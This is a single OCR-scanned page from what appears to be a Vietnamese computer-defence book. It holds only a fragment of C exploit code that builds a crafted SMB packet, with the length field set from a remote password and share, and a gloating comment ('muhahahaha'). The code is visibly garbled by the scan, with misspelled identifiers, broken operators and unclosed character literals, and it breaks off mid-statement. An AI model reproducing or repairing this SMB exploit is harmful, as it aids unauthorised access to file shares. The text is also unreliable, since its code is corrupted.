Page 120 - Hướng Dẫn Cách Phòng Thủ Và Khắc Phục Sự Cố Máy Tính

if (send (sock, Ipdata, strlen (password) + strlen (login)
  + 61,
      0) = = -1) return -1;
      if (recv (sock, Ipdata,  1024, 0) == -1) return -1;

      return (Ipdata [9]);
      }
      void build_crafted_smb_packet (char*remoteshare, char
      *remotepassword)
       {
      memset (smb_packet, 0, sizeof (smb_packet));
      smb_packet [4] ='\xff;

      smb_packet [5] = 'S'
      smb_packet [6] = 'M';
      smb_packet [7] = 'B';
      smb_packet [8] = 'u';
      smb_packet [13] = '\xl8';

      smb_packet [14] = '\x01';
      smb_packet [15] = '
      smb_packet [31] = '\x28';
      smb_packet [32] = uid%256;
      sinb_packet [33] = uid/256;
      smb_packet [36] = '\x04';
      smb_packet [37] = '\x ff;
      smb_packet [43] =  strlen (remotepassword);

      // number of bytes we wanna remote side to confirm.
      // we set the rules... muhahahaha
      smb_packet  [45]=strlen  (remotepassword)  +  strlen
  (remoteshare) +1;
      memcpy (&smb_packet[47], remotepassvvord,

